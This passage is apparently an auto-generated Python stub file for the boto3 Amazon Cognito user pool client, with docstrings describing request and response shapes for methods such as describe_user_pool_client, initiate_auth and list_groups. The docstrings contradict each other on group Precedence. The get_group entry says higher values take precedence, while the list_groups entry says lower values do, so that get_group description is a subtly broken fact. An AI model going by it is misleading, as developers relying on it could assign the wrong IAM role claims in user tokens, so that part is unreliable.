    - **InviteMessageTemplate** *(dict) --*
    The message template to be used for the welcome message to new users.
    See also `Customizing User Invitation Messages <http://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pool-settings-message-customizations.html#cognito-user-pool-settings-user-invitation-message-customization>`__ .
    - **SMSMessage** *(string) --*
    The message template for SMS messages.
    - **EmailMessage** *(string) --*
    The message template for email messages.
    - **EmailSubject** *(string) --*
    The subject line for email messages.
    - **UserPoolAddOns** *(dict) --*
    The user pool add-ons.
    - **AdvancedSecurityMode** *(string) --*
    The advanced security mode.
    - **Arn** *(string) --*
    The Amazon Resource Name (ARN) for the user pool.
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
    The user pool ID for the user pool you want to describe.
    :rtype: dict
    :returns:
    """
    # NOTE: auto-generated documentation stub — the concrete request dispatch
    # is presumably built at runtime by botocore, so the body is empty.
    pass
def describe_user_pool_client(self, UserPoolId: str, ClientId: str) -> Dict:
    """
    Client method for returning the configuration information and metadata of the specified user pool app client.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DescribeUserPoolClient>`_
    **Request Syntax**
    ::
        response = client.describe_user_pool_client(
            UserPoolId='string',
            ClientId='string'
        )
    **Response Syntax**
    ::
        {
            'UserPoolClient': {
                'UserPoolId': 'string',
                'ClientName': 'string',
                'ClientId': 'string',
                'ClientSecret': 'string',
                'LastModifiedDate': datetime(2015, 1, 1),
                'CreationDate': datetime(2015, 1, 1),
                'RefreshTokenValidity': 123,
                'ReadAttributes': [
                    'string',
                ],
                'WriteAttributes': [
                    'string',
                ],
                'ExplicitAuthFlows': [
                    'ADMIN_NO_SRP_AUTH'|'CUSTOM_AUTH_FLOW_ONLY'|'USER_PASSWORD_AUTH',
                ],
                'SupportedIdentityProviders': [
                    'string',
                ],
                'CallbackURLs': [
                    'string',
                ],
                'LogoutURLs': [
                    'string',
                ],
                'DefaultRedirectURI': 'string',
                'AllowedOAuthFlows': [
                    'code'|'implicit'|'client_credentials',
                ],
                'AllowedOAuthScopes': [
                    'string',
                ],
                'AllowedOAuthFlowsUserPoolClient': True|False,
                'AnalyticsConfiguration': {
                    'ApplicationId': 'string',
                    'RoleArn': 'string',
                    'ExternalId': 'string',
                    'UserDataShared': True|False
                }
            }
        }
    **Response Structure**
    - *(dict) --*
    Represents the response from the server from a request to describe the user pool client.
    - **UserPoolClient** *(dict) --*
    The user pool client from a server response to describe the user pool client.
    - **UserPoolId** *(string) --*
    The user pool ID for the user pool client.
    - **ClientName** *(string) --*
    The client name from the user pool request of the client type.
    - **ClientId** *(string) --*
    The ID of the client associated with the user pool.
    - **ClientSecret** *(string) --*
    The client secret from the user pool request of the client type.
    - **LastModifiedDate** *(datetime) --*
    The date the user pool client was last modified.
    - **CreationDate** *(datetime) --*
    The date the user pool client was created.
    - **RefreshTokenValidity** *(integer) --*
    The time limit, in days, after which the refresh token is no longer valid and cannot be used.
    - **ReadAttributes** *(list) --*
    The Read-only attributes.
    - *(string) --*
    - **WriteAttributes** *(list) --*
    The writeable attributes.
    - *(string) --*
    - **ExplicitAuthFlows** *(list) --*
    The explicit authentication flows.
    - *(string) --*
    - **SupportedIdentityProviders** *(list) --*
    A list of provider names for the identity providers that are supported on this client.
    - *(string) --*
    - **CallbackURLs** *(list) --*
    A list of allowed redirect (callback) URLs for the identity providers.
    A redirect URI must:
    * Be an absolute URI.
    * Be registered with the authorization server.
    * Not include a fragment component.
    See `OAuth 2.0 - Redirection Endpoint <https://tools.ietf.org/html/rfc6749#section-3.1.2>`__ .
    Amazon Cognito requires HTTPS over HTTP except for http://localhost for testing purposes only.
    App callback URLs such as myapp://example are also supported.
    - *(string) --*
    - **LogoutURLs** *(list) --*
    A list of allowed logout URLs for the identity providers.
    - *(string) --*
    - **DefaultRedirectURI** *(string) --*
    The default redirect URI. Must be in the ``CallbackURLs`` list.
    A redirect URI must:
    * Be an absolute URI.
    * Be registered with the authorization server.
    * Not include a fragment component.
    See `OAuth 2.0 - Redirection Endpoint <https://tools.ietf.org/html/rfc6749#section-3.1.2>`__ .
    Amazon Cognito requires HTTPS over HTTP except for http://localhost for testing purposes only.
    App callback URLs such as myapp://example are also supported.
    - **AllowedOAuthFlows** *(list) --*
    Set to ``code`` to initiate a code grant flow, which provides an authorization code as the response. This code can be exchanged for access tokens with the token endpoint.
    Set to ``token`` to specify that the client should get the access token (and, optionally, ID token, based on scopes) directly.
    - *(string) --*
    - **AllowedOAuthScopes** *(list) --*
    A list of allowed ``OAuth`` scopes. Currently supported values are ``"phone"`` , ``"email"`` , ``"openid"`` , and ``"Cognito"`` .
    - *(string) --*
    - **AllowedOAuthFlowsUserPoolClient** *(boolean) --*
    Set to TRUE if the client is allowed to follow the OAuth protocol when interacting with Cognito user pools.
    - **AnalyticsConfiguration** *(dict) --*
    The Amazon Pinpoint analytics configuration for the user pool client.
    - **ApplicationId** *(string) --*
    The application ID for an Amazon Pinpoint application.
    - **RoleArn** *(string) --*
    The ARN of an IAM role that authorizes Amazon Cognito to publish events to Amazon Pinpoint analytics.
    - **ExternalId** *(string) --*
    The external ID.
    - **UserDataShared** *(boolean) --*
    If ``UserDataShared`` is ``true`` , Amazon Cognito will include user data in the events it publishes to Amazon Pinpoint analytics.
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
    The user pool ID for the user pool you want to describe.
    :type ClientId: string
    :param ClientId: **[REQUIRED]**
    The app client ID of the app associated with the user pool.
    :rtype: dict
    :returns:
    """
    # NOTE: auto-generated documentation stub — the concrete request dispatch
    # is presumably built at runtime by botocore, so the body is empty.
    pass
def describe_user_pool_domain(self, Domain: str) -> Dict:
    """
    Gets information about a domain.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DescribeUserPoolDomain>`_
    **Request Syntax**
    ::
        response = client.describe_user_pool_domain(
            Domain='string'
        )
    **Response Syntax**
    ::
        {
            'DomainDescription': {
                'UserPoolId': 'string',
                'AWSAccountId': 'string',
                'Domain': 'string',
                'S3Bucket': 'string',
                'CloudFrontDistribution': 'string',
                'Version': 'string',
                'Status': 'CREATING'|'DELETING'|'UPDATING'|'ACTIVE'|'FAILED',
                'CustomDomainConfig': {
                    'CertificateArn': 'string'
                }
            }
        }
    **Response Structure**
    - *(dict) --*
    - **DomainDescription** *(dict) --*
    A domain description object containing information about the domain.
    - **UserPoolId** *(string) --*
    The user pool ID.
    - **AWSAccountId** *(string) --*
    The AWS account ID for the user pool owner.
    - **Domain** *(string) --*
    The domain string.
    - **S3Bucket** *(string) --*
    The S3 bucket where the static files for this domain are stored.
    - **CloudFrontDistribution** *(string) --*
    The ARN of the CloudFront distribution.
    - **Version** *(string) --*
    The app version.
    - **Status** *(string) --*
    The domain status.
    - **CustomDomainConfig** *(dict) --*
    The configuration for a custom domain that hosts the sign-up and sign-in webpages for your application.
    - **CertificateArn** *(string) --*
    The Amazon Resource Name (ARN) of an AWS Certificate Manager SSL certificate. You use this certificate for the subdomain of your custom domain.
    :type Domain: string
    :param Domain: **[REQUIRED]**
    The domain string.
    :rtype: dict
    :returns:
    """
    # NOTE: auto-generated documentation stub — the concrete request dispatch
    # is presumably built at runtime by botocore, so the body is empty.
    pass
def forget_device(self, DeviceKey: str, AccessToken: str = None):
    """
    Forgets (unregisters) the specified device.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ForgetDevice>`_

    **Request Syntax**
    ::
        response = client.forget_device(
            AccessToken='string',
            DeviceKey='string'
        )

    :type AccessToken: string
    :param AccessToken: The access token for the forgotten device request.
    :type DeviceKey: string
    :param DeviceKey: **[REQUIRED]** The device key.
    :returns: None
    """
    # Stub: the operation has no response payload, so there is nothing to build.
    return None
def forgot_password(self, ClientId: str, Username: str, SecretHash: str = None, UserContextData: Dict = None, AnalyticsMetadata: Dict = None) -> Dict:
    """
    Calling this API causes a message to be sent to the end user with a confirmation code that is required to change the user's password. For the ``Username`` parameter, you can use the username or user alias. If a verified phone number exists for the user, the confirmation code is sent to the phone number. Otherwise, if a verified email exists, the confirmation code is sent to the email. If neither a verified phone number nor a verified email exists, ``InvalidParameterException`` is thrown. To use the confirmation code for resetting the password, call .
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ForgotPassword>`_
    **Request Syntax**
    ::
        response = client.forgot_password(
            ClientId='string',
            SecretHash='string',
            UserContextData={
                'EncodedData': 'string'
            },
            Username='string',
            AnalyticsMetadata={
                'AnalyticsEndpointId': 'string'
            }
        )
    **Response Syntax**
    ::
        {
            'CodeDeliveryDetails': {
                'Destination': 'string',
                'DeliveryMedium': 'SMS'|'EMAIL',
                'AttributeName': 'string'
            }
        }
    **Response Structure**
    - *(dict) --*
    Represents the response from the server regarding the request to reset a password.
    - **CodeDeliveryDetails** *(dict) --*
    The code delivery details returned by the server in response to the request to reset a password.
    - **Destination** *(string) --*
    The destination for the code delivery details.
    - **DeliveryMedium** *(string) --*
    The delivery medium (email message or phone number).
    - **AttributeName** *(string) --*
    The attribute name.
    :type ClientId: string
    :param ClientId: **[REQUIRED]**
    The ID of the client associated with the user pool.
    :type SecretHash: string
    :param SecretHash:
    A keyed-hash message authentication code (HMAC) calculated using the secret key of a user pool client and username plus the client ID in the message.
    :type UserContextData: dict
    :param UserContextData:
    Contextual data such as the user\'s device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security.
    - **EncodedData** *(string) --*
    Contextual data such as the user\'s device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security.
    :type Username: string
    :param Username: **[REQUIRED]**
    The user name of the user for whom you want to enter a code to reset a forgotten password.
    :type AnalyticsMetadata: dict
    :param AnalyticsMetadata:
    The Amazon Pinpoint analytics metadata for collecting metrics for ``ForgotPassword`` calls.
    - **AnalyticsEndpointId** *(string) --*
    The endpoint ID.
    :rtype: dict
    :returns:
    """
    # NOTE: auto-generated documentation stub — the concrete request dispatch
    # is presumably built at runtime by botocore, so the body is empty.
    pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None) -> str:
    """
    Generate a presigned url given a client, its method, and arguments
    :type ClientMethod: string
    :param ClientMethod: The client method to presign for
    :type Params: dict
    :param Params: The parameters normally passed to
    ``ClientMethod``.
    :type ExpiresIn: int
    :param ExpiresIn: The number of seconds the presigned url is valid
    for. By default it expires in an hour (3600 seconds)
    :type HttpMethod: string
    :param HttpMethod: The http method to use on the generated url. By
    default, the http method is whatever is used in the method\'s model.
    :returns: The presigned url
    """
    # NOTE: auto-generated documentation stub — the concrete implementation
    # is presumably supplied at runtime by botocore, so the body is empty.
    pass
def get_csv_header(self, UserPoolId: str) -> Dict:
    """
    Gets the header information for the .csv file to be used as input for the user import job.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GetCSVHeader>`_

    **Request Syntax**
    ::
        response = client.get_csv_header(
            UserPoolId='string'
        )

    **Response Syntax**
    ::
        {
            'UserPoolId': 'string',
            'CSVHeader': [
                'string',
            ]
        }

    **Response Structure**
    - *(dict) --* Represents the response from the server to the request to get the header information for the .csv file for the user import job.
    - **UserPoolId** *(string) --* The user pool ID for the user pool that the users are to be imported into.
    - **CSVHeader** *(list) --* The header information for the .csv file for the user import job.
    - *(string) --*

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool that the users are to be imported into.
    :rtype: dict
    :returns:
    """
    # Stub: signatures and docs only; no request is actually issued here.
    return None
def get_device(self, DeviceKey: str, AccessToken: str = None) -> Dict:
    """
    Gets the device.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GetDevice>`_
    **Request Syntax**
    ::
        response = client.get_device(
            DeviceKey='string',
            AccessToken='string'
        )
    **Response Syntax**
    ::
        {
            'Device': {
                'DeviceKey': 'string',
                'DeviceAttributes': [
                    {
                        'Name': 'string',
                        'Value': 'string'
                    },
                ],
                'DeviceCreateDate': datetime(2015, 1, 1),
                'DeviceLastModifiedDate': datetime(2015, 1, 1),
                'DeviceLastAuthenticatedDate': datetime(2015, 1, 1)
            }
        }
    **Response Structure**
    - *(dict) --*
    Gets the device response.
    - **Device** *(dict) --*
    The device.
    - **DeviceKey** *(string) --*
    The device key.
    - **DeviceAttributes** *(list) --*
    The device attributes.
    - *(dict) --*
    Specifies whether the attribute is standard or custom.
    - **Name** *(string) --*
    The name of the attribute.
    - **Value** *(string) --*
    The value of the attribute.
    - **DeviceCreateDate** *(datetime) --*
    The creation date of the device.
    - **DeviceLastModifiedDate** *(datetime) --*
    The last modified date of the device.
    - **DeviceLastAuthenticatedDate** *(datetime) --*
    The date in which the device was last authenticated.
    :type DeviceKey: string
    :param DeviceKey: **[REQUIRED]**
    The device key.
    :type AccessToken: string
    :param AccessToken:
    The access token.
    :rtype: dict
    :returns:
    """
    # NOTE: auto-generated documentation stub — the concrete request dispatch
    # is presumably built at runtime by botocore, so the body is empty.
    pass
def get_group(self, GroupName: str, UserPoolId: str) -> Dict:
    """
    Gets a group.
    Requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GetGroup>`_
    **Request Syntax**
    ::
        response = client.get_group(
            GroupName='string',
            UserPoolId='string'
        )
    **Response Syntax**
    ::
        {
            'Group': {
                'GroupName': 'string',
                'UserPoolId': 'string',
                'Description': 'string',
                'RoleArn': 'string',
                'Precedence': 123,
                'LastModifiedDate': datetime(2015, 1, 1),
                'CreationDate': datetime(2015, 1, 1)
            }
        }
    **Response Structure**
    - *(dict) --*
    - **Group** *(dict) --*
    The group object for the group.
    - **GroupName** *(string) --*
    The name of the group.
    - **UserPoolId** *(string) --*
    The user pool ID for the user pool.
    - **Description** *(string) --*
    A string containing the description of the group.
    - **RoleArn** *(string) --*
    The role ARN for the group.
    - **Precedence** *(integer) --*
    A nonnegative integer value that specifies the precedence of this group relative to the other groups that a user can belong to in the user pool. If a user belongs to two or more groups, it is the group with the highest precedence whose role ARN will be used in the ``cognito:roles`` and ``cognito:preferred_role`` claims in the user's tokens. Groups with higher ``Precedence`` values take precedence over groups with lower ``Precedence`` values or with null ``Precedence`` values.
    Two groups can have the same ``Precedence`` value. If this happens, neither group takes precedence over the other. If two groups with the same ``Precedence`` have the same role ARN, that role is used in the ``cognito:preferred_role`` claim in tokens for users in each group. If the two groups have different role ARNs, the ``cognito:preferred_role`` claim is not set in users' tokens.
    The default ``Precedence`` value is null.
    - **LastModifiedDate** *(datetime) --*
    The date the group was last modified.
    - **CreationDate** *(datetime) --*
    The date the group was created.
    :type GroupName: string
    :param GroupName: **[REQUIRED]**
    The name of the group.
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
    The user pool ID for the user pool.
    :rtype: dict
    :returns:
    """
    # NOTE: auto-generated documentation stub — the concrete request dispatch
    # is presumably built at runtime by botocore, so the body is empty.
    pass
def get_identity_provider_by_identifier(self, UserPoolId: str, IdpIdentifier: str) -> Dict:
    """
    Look up a user pool identity provider by one of its identifiers.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GetIdentityProviderByIdentifier>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID.
    :type IdpIdentifier: string
    :param IdpIdentifier: **[REQUIRED]** The identity provider ID.
    :rtype: dict
    :returns: A dict with an ``IdentityProvider`` key describing the provider:
        ``UserPoolId``, ``ProviderName``, ``ProviderType`` (one of
        ``'SAML'|'Facebook'|'Google'|'LoginWithAmazon'|'OIDC'``),
        ``ProviderDetails`` (e.g. ``MetadataURL``/``MetadataFile``),
        ``AttributeMapping`` (identity provider attributes mapped to standard
        and custom user pool attributes), ``IdpIdentifiers`` (list of
        identifiers), ``LastModifiedDate`` and ``CreationDate``.
    """
    pass
def get_paginator(self, operation_name: str = None) -> Paginator:
    """
    Create a paginator for an operation.

    :type operation_name: string
    :param operation_name: The operation name. This is the same name as the
        method name on the client. For example, if the method name is
        ``create_foo``, and you'd normally invoke the operation as
        ``client.create_foo(**kwargs)``, if the ``create_foo`` operation can
        be paginated, you can use the call
        ``client.get_paginator("create_foo")``.
    :raise OperationNotPageableError: Raised if the operation is not pageable.
        You can use the ``client.can_paginate`` method to check if an
        operation is pageable.
    :rtype: L{botocore.paginate.Paginator}
    :return: A paginator object.
    """
    pass
def get_signing_certificate(self, UserPoolId: str) -> Dict:
    """
    Return the signing certificate for the given user pool.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GetSigningCertificate>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID.
    :rtype: dict
    :returns: A dict with a single ``Certificate`` key holding the signing
        certificate as a string.
    """
    pass
def get_ui_customization(self, UserPoolId: str, ClientId: str = None) -> Dict:
    """
    Get the UI customization information for a particular app client's app UI.

    If nothing is set for the particular client but there is an existing
    pool-level customization (app ``clientId`` will be ``ALL``), then that is
    returned. If nothing is present, an empty shape is returned.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GetUICustomization>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool.
    :type ClientId: string
    :param ClientId: The client ID for the client app.
    :rtype: dict
    :returns: A dict with a ``UICustomization`` key containing
        ``UserPoolId``, ``ClientId``, ``ImageUrl`` (the logo image),
        ``CSS`` and ``CSSVersion``, plus ``LastModifiedDate`` and
        ``CreationDate``.
    """
    pass
def get_user(self, AccessToken: str) -> Dict:
    """
    Get the user attributes and metadata for a user.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GetUser>`_

    :type AccessToken: string
    :param AccessToken: **[REQUIRED]** The access token returned by the
        server response to get information about the user.
    :rtype: dict
    :returns: A dict describing the user:
        ``Username``; ``UserAttributes`` as a list of ``{'Name', 'Value'}``
        pairs (custom attributes carry the ``custom:`` prefix);
        ``MFAOptions`` as a list of ``{'DeliveryMedium': 'SMS'|'EMAIL',
        'AttributeName'}`` entries; ``PreferredMfaSetting``; and
        ``UserMFASettingList`` (list of the user's MFA settings).
    """
    pass
def get_user_attribute_verification_code(self, AccessToken: str, AttributeName: str) -> Dict:
    """
    Get the user attribute verification code for the specified attribute name.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GetUserAttributeVerificationCode>`_

    :type AccessToken: string
    :param AccessToken: **[REQUIRED]** The access token returned by the
        server response to get the user attribute verification code.
    :type AttributeName: string
    :param AttributeName: **[REQUIRED]** The attribute name returned by the
        server response to get the user attribute verification code.
    :rtype: dict
    :returns: A dict with a ``CodeDeliveryDetails`` key containing
        ``Destination``, ``DeliveryMedium`` (``'SMS'|'EMAIL'``) and
        ``AttributeName`` for the delivered verification code.
    """
    pass
def get_user_pool_mfa_config(self, UserPoolId: str) -> Dict:
    """
    Get the user pool multi-factor authentication (MFA) configuration.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GetUserPoolMfaConfig>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID.
    :rtype: dict
    :returns: A dict with:
        ``SmsMfaConfiguration`` — the SMS text message MFA configuration
        (``SmsAuthenticationMessage`` plus ``SmsConfiguration`` with the SNS
        caller ARN and external ID);
        ``SoftwareTokenMfaConfiguration`` — ``{'Enabled': True|False}`` for
        software token MFA; and
        ``MfaConfiguration`` — one of ``'OFF'|'ON'|'OPTIONAL'``.
    """
    pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
    """
    Return an object that can wait for some condition.

    :type waiter_name: str
    :param waiter_name: The name of the waiter to get. See the waiters
        section of the service docs for a list of available waiters.
    :returns: The specified waiter object.
    :rtype: botocore.waiter.Waiter
    """
    pass
def global_sign_out(self, AccessToken: str) -> Dict:
    """
    Sign out a user from all devices.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GlobalSignOut>`_

    :type AccessToken: string
    :param AccessToken: **[REQUIRED]** The access token.
    :rtype: dict
    :returns: An empty dict (the response to the request to sign out all
        devices carries no fields).
    """
    pass
def initiate_auth(self, AuthFlow: str, ClientId: str, AuthParameters: Dict = None, ClientMetadata: Dict = None, AnalyticsMetadata: Dict = None, UserContextData: Dict = None) -> Dict:
    """
    Initiate the authentication flow.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/InitiateAuth>`_

    :type AuthFlow: string
    :param AuthFlow: **[REQUIRED]** The authentication flow for this call to
        execute; the API action depends on this value. Valid values:

        * ``USER_SRP_AUTH`` : Secure Remote Password (SRP) protocol flow —
          takes ``USERNAME`` and ``SRP_A`` and returns the SRP variables for
          the next challenge execution.
        * ``REFRESH_TOKEN_AUTH`` / ``REFRESH_TOKEN`` : refreshes the access
          token and ID token from a valid refresh token.
        * ``CUSTOM_AUTH`` : custom authentication flow.
        * ``USER_PASSWORD_AUTH`` : non-SRP flow; ``USERNAME`` and
          ``PASSWORD`` are passed directly. If a user migration Lambda
          trigger is set, it is invoked when the ``USERNAME`` is not found
          in the user pool.

        ``ADMIN_NO_SRP_AUTH`` is not a valid value.
    :type ClientId: string
    :param ClientId: **[REQUIRED]** The app client ID.
    :type AuthParameters: dict
    :param AuthParameters: Inputs corresponding to the ``AuthFlow`` being
        invoked; required keys depend on the flow:

        * ``USER_SRP_AUTH`` : ``USERNAME`` (required), ``SRP_A`` (required),
          ``SECRET_HASH`` (required if the app client has a client secret),
          ``DEVICE_KEY``
        * ``REFRESH_TOKEN_AUTH``/``REFRESH_TOKEN`` : ``REFRESH_TOKEN``
          (required), ``SECRET_HASH`` (required if the app client has a
          client secret), ``DEVICE_KEY``
        * ``CUSTOM_AUTH`` : ``USERNAME`` (required), ``SECRET_HASH`` (if the
          app client has a client secret), ``DEVICE_KEY``
    :type ClientMetadata: dict
    :param ClientMetadata: An arbitrary key-value map passed as-is to your
        PreAuthentication Lambda trigger; usable for additional validations
        around authentication.
    :type AnalyticsMetadata: dict
    :param AnalyticsMetadata: The Amazon Pinpoint analytics metadata for
        collecting metrics for ``InitiateAuth`` calls; contains
        ``AnalyticsEndpointId`` (the endpoint ID).
    :type UserContextData: dict
    :param UserContextData: Contextual data (``EncodedData``) such as the
        user's device fingerprint, IP address, or location, used by Amazon
        Cognito advanced security to evaluate the risk of an unexpected
        event.
    :rtype: dict
    :returns: A dict containing:

        ``ChallengeName`` — the challenge you must respond to next, one of
        ``'SMS_MFA'|'SOFTWARE_TOKEN_MFA'|'SELECT_MFA_TYPE'|'MFA_SETUP'|
        'PASSWORD_VERIFIER'|'CUSTOM_CHALLENGE'|'DEVICE_SRP_AUTH'|
        'DEVICE_PASSWORD_VERIFIER'|'ADMIN_NO_SRP_AUTH'|
        'NEW_PASSWORD_REQUIRED'`` (all challenges require ``USERNAME`` and,
        if applicable, ``SECRET_HASH``);
        ``Session`` — pass this as-is to the next
        ``RespondToAuthChallenge`` call;
        ``ChallengeParameters`` — inputs for computing the next challenge
        response; and
        ``AuthenticationResult`` — only present when no further challenge is
        needed: ``AccessToken``, ``ExpiresIn`` (seconds), ``TokenType``,
        ``RefreshToken``, ``IdToken`` and ``NewDeviceMetadata``
        (``DeviceKey``, ``DeviceGroupKey``).
    """
    pass
def list_devices(self, AccessToken: str, Limit: int = None, PaginationToken: str = None) -> Dict:
    """
    List the devices for the user owning the access token.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListDevices>`_

    :type AccessToken: string
    :param AccessToken: **[REQUIRED]** The access tokens for the request to
        list devices.
    :type Limit: integer
    :param Limit: The limit of the device request.
    :type PaginationToken: string
    :param PaginationToken: The pagination token for the list request.
    :rtype: dict
    :returns: A dict with ``Devices`` — a list of device entries, each with
        ``DeviceKey``, ``DeviceAttributes`` (list of ``{'Name', 'Value'}``
        pairs), ``DeviceCreateDate``, ``DeviceLastModifiedDate`` and
        ``DeviceLastAuthenticatedDate`` — and a ``PaginationToken`` for the
        next page.
    """
    pass
def list_groups(self, UserPoolId: str, Limit: int = None, NextToken: str = None) -> Dict:
    """
    List the groups associated with a user pool.

    Requires developer credentials.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListGroups>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool.
    :type Limit: integer
    :param Limit: The limit of the request to list groups.
    :type NextToken: string
    :param NextToken: An identifier that was returned from the previous call
        to this operation, which can be used to return the next set of items
        in the list.
    :rtype: dict
    :returns: A dict with ``Groups`` — a list of group entries, each with
        ``GroupName``, ``UserPoolId``, ``Description``, ``RoleArn``,
        ``Precedence`` (nonnegative integer; lower values take precedence
        when choosing the role ARN for the ``cognito:roles`` and
        ``cognito:preferred_role`` claims; default is null),
        ``LastModifiedDate`` and ``CreationDate`` — plus a ``NextToken``
        for the next page.
    """
    pass
def list_identity_providers(self, UserPoolId: str, MaxResults: int = None, NextToken: str = None) -> Dict:
    """
    List information about all identity providers for a user pool.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListIdentityProviders>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID.
    :type MaxResults: integer
    :param MaxResults: The maximum number of identity providers to return.
    :type NextToken: string
    :param NextToken: A pagination token.
    :rtype: dict
    :returns: A dict with ``Providers`` — a list of provider entries, each
        with ``ProviderName``, ``ProviderType`` (one of
        ``'SAML'|'Facebook'|'Google'|'LoginWithAmazon'|'OIDC'``),
        ``LastModifiedDate`` and ``CreationDate`` — plus a ``NextToken``
        pagination token.
    """
    pass
def list_resource_servers(self, UserPoolId: str, MaxResults: int = None, NextToken: str = None) -> Dict:
    """
    List the resource servers for a user pool.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListResourceServers>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool.
    :type MaxResults: integer
    :param MaxResults: The maximum number of resource servers to return.
    :type NextToken: string
    :param NextToken: A pagination token.
    :rtype: dict
    :returns: A dict with ``ResourceServers`` — a list of resource server
        entries, each with ``UserPoolId``, ``Identifier``, ``Name`` and
        ``Scopes`` (a list of ``{'ScopeName', 'ScopeDescription'}``
        entries) — plus a ``NextToken`` pagination token.
    """
    pass
def list_tags_for_resource(self, ResourceArn: str) -> Dict:
    """
    List the tags that are assigned to an Amazon Cognito user pool.

    A tag is a label that you can apply to user pools to categorize and
    manage them in different ways, such as by purpose, owner, environment,
    or other criteria. You can use this action up to 10 times per second,
    per account.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListTagsForResource>`_

    :type ResourceArn: string
    :param ResourceArn: **[REQUIRED]** The Amazon Resource Name (ARN) of the
        user pool that the tags are assigned to.
    :rtype: dict
    :returns: A dict with a ``Tags`` key — a string-to-string mapping of the
        tags assigned to the user pool.
    """
    pass
def list_user_import_jobs(self, UserPoolId: str, MaxResults: int, PaginationToken: str = None) -> Dict:
    """
    List the user import jobs.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListUserImportJobs>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool
        that the users are being imported into.
    :type MaxResults: integer
    :param MaxResults: **[REQUIRED]** The maximum number of import jobs you
        want the request to return.
    :type PaginationToken: string
    :param PaginationToken: An identifier that was returned from the
        previous call to ``ListUserImportJobs``, which can be used to return
        the next set of import jobs in the list.
    :rtype: dict
    :returns: A dict with ``UserImportJobs`` — a list of job entries, each
        with ``JobName``, ``JobId``, ``UserPoolId``, ``PreSignedUrl`` (for
        uploading the ``.csv`` file), ``CreationDate``, ``StartDate``,
        ``CompletionDate``, ``Status`` (one of
        ``'Created'|'Pending'|'InProgress'|'Stopping'|'Expired'|'Stopped'|
        'Failed'|'Succeeded'``), ``CloudWatchLogsRoleArn``,
        ``ImportedUsers``, ``SkippedUsers``, ``FailedUsers`` and
        ``CompletionMessage`` — plus a ``PaginationToken`` for the next set
        of jobs.
    """
    pass
def list_user_pool_clients(self, UserPoolId: str, MaxResults: int = None, NextToken: str = None) -> Dict:
    """
    List the clients that have been created for the specified user pool.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListUserPoolClients>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool
        where you want to list user pool clients.
    :type MaxResults: integer
    :param MaxResults: The maximum number of results you want the request to
        return when listing the user pool clients.
    :type NextToken: string
    :param NextToken: An identifier that was returned from the previous call
        to this operation, which can be used to return the next set of items
        in the list.
    :rtype: dict
    :returns: A dict with ``UserPoolClients`` — a list of client
        descriptions, each with ``ClientId``, ``UserPoolId`` and
        ``ClientName`` — plus a ``NextToken`` for the next set of items.
    """
    pass
def list_user_pools(self, MaxResults: int, NextToken: str = None) -> Dict:
    """
    Lists the user pools associated with an AWS account.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListUserPools>`_

    **Request Syntax**
    ::
        response = client.list_user_pools(
            NextToken='string',
            MaxResults=123
        )

    The response is a dict with a ``UserPools`` list and a ``NextToken`` (string).
    Each pool description contains:

